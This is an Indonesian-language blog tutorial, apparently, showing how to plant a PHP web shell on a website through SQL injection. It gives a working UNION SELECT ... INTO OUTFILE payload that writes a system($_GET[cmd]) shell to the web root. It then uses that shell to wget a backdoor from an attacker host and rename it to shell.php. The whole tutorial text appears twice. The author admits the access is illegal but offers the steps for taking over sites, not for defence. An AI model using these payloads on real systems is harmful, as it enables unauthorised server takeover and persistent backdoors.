Apakabar semuanya ? Baik-baik saja kan ? Untuk file upload dengan metode SQL Injection ini sangat jarang, karena kita memerlukan user yang bertindak sebagai Root atau user yang memiliki akses read dan write file. Sebelumnya sudah saya bahas untuk SQL Injection di halaman berikut SQL Injection.
Setelah kalian memahami penggunaan SQL Injection, kita akan memperluasnya sampai mengupload sebuah file. Informasi yang harus diketahui adalah direktori dari sebuah website, direktori website dapat kita ambil dengan berbagai cara salah satu contoh dengan error saat mengecek kerentanan terhadap SQL Injection, seperti berikut :
Jadi kita dapat mengupload filenya pada /nfc/c05/h02/mnt/83231/domains/webrusak.com/html/namafile.php. Untuk mengupload filenya kita memanfaatkan fungsi SQL yaitu into outfile. Kita tambahkan kode PHP pada payload SQLi :
<?php system($_GET[cmd]);?>
sehingga url menjadi seperti ini :
URL : https://webrusak.com/berita.php?id=10 and 1=0 union select 1,2,3,'<?php system($_GET[cmd]);?>',5 into outfile "/nfc/c05/h02/mnt/83231/domains/webrusak.com/html/small-cmd.php"-- -
Kita buka file tadi pada :
https://namawebsite.com/small-cmd.php?cmd=
Jika filenya dapat dibuka berarti websitenya rentan. Kalian bisa isi nilai dari parameter cmd dengan perintah wget untuk upload shell semisal :
URL : https://namawebsite.com/small-cmd.php?cmd=wget+http://webattacker.com/shells/php/shell.txt
Oke, setelah itu kita rename shell.txt menjadi shell.php dengan perintah mv atau dapat disebut move.
URL : https://namawebsite.com/small-cmd.php?cmd=mv+shell.txt+shell.php
Terakhir, karena shell sudah terupload ke server kita dapat membukanya secara langsung dan kita sudah berhasil menguasai website.
https://namawebsite.com/shell.php
*Shell tersebut biasa dinamakan dengan Backdoor ( pintu belakang ) maksudnya adalah sebuah file / aplikasi yang digunakan untuk mengakses sistem tanpa menjadi admin ( akses secara ilegal )
Itu saja untuk tutorial kali ini semoga bermanfaat dan sampai sumpa pada tutorial berikutnya. Silahkan untuk bertanya pada kolom komentar jika ada yang kurang dimengerti.
Setelah kalian memahami penggunaan SQL Injection, kita akan memperluasnya sampai mengupload sebuah file. Informasi yang harus diketahui adalah direktori dari sebuah website, direktori website dapat kita ambil dengan berbagai cara salah satu contoh dengan error saat mengecek kerentanan terhadap SQL Injection, seperti berikut :
Jadi kita dapat mengupload filenya pada /nfc/c05/h02/mnt/83231/domains/webrusak.com/html/namafile.php. Untuk mengupload filenya kita memanfaatkan fungsi SQL yaitu into outfile. Kita tambahkan kode PHP pada payload SQLi :
<?php system($_GET[cmd]);?>
sehingga url menjadi seperti ini :
URL : https://webrusak.com/berita.php?id=10 and 1=0 union select 1,2,3,'<?php system($_GET[cmd]);?>',5 into outfile "/nfc/c05/h02/mnt/83231/domains/webrusak.com/html/small-cmd.php"-- -
Kita buka file tadi pada :
https://namawebsite.com/small-cmd.php?cmd=
Jika filenya dapat dibuka berarti websitenya rentan. Kalian bisa isi nilai dari parameter cmd dengan perintah wget untuk upload shell semisal :
URL : https://namawebsite.com/small-cmd.php?cmd=wget+http://webattacker.com/shells/php/shell.txt
Oke, setelah itu kita rename shell.txt menjadi shell.php dengan perintah mv atau dapat disebut move.
URL : https://namawebsite.com/small-cmd.php?cmd=mv+shell.txt+shell.php
Terakhir, karena shell sudah terupload ke server kita dapat membukanya secara langsung dan kita sudah berhasil menguasai website.
https://namawebsite.com/shell.php
*Shell tersebut biasa dinamakan dengan Backdoor ( pintu belakang ) maksudnya adalah sebuah file / aplikasi yang digunakan untuk mengakses sistem tanpa menjadi admin ( akses secara ilegal )
Itu saja untuk tutorial kali ini semoga bermanfaat dan sampai sumpa pada tutorial berikutnya. Silahkan untuk bertanya pada kolom komentar jika ada yang kurang dimengerti.
0 komentar:
Post a Comment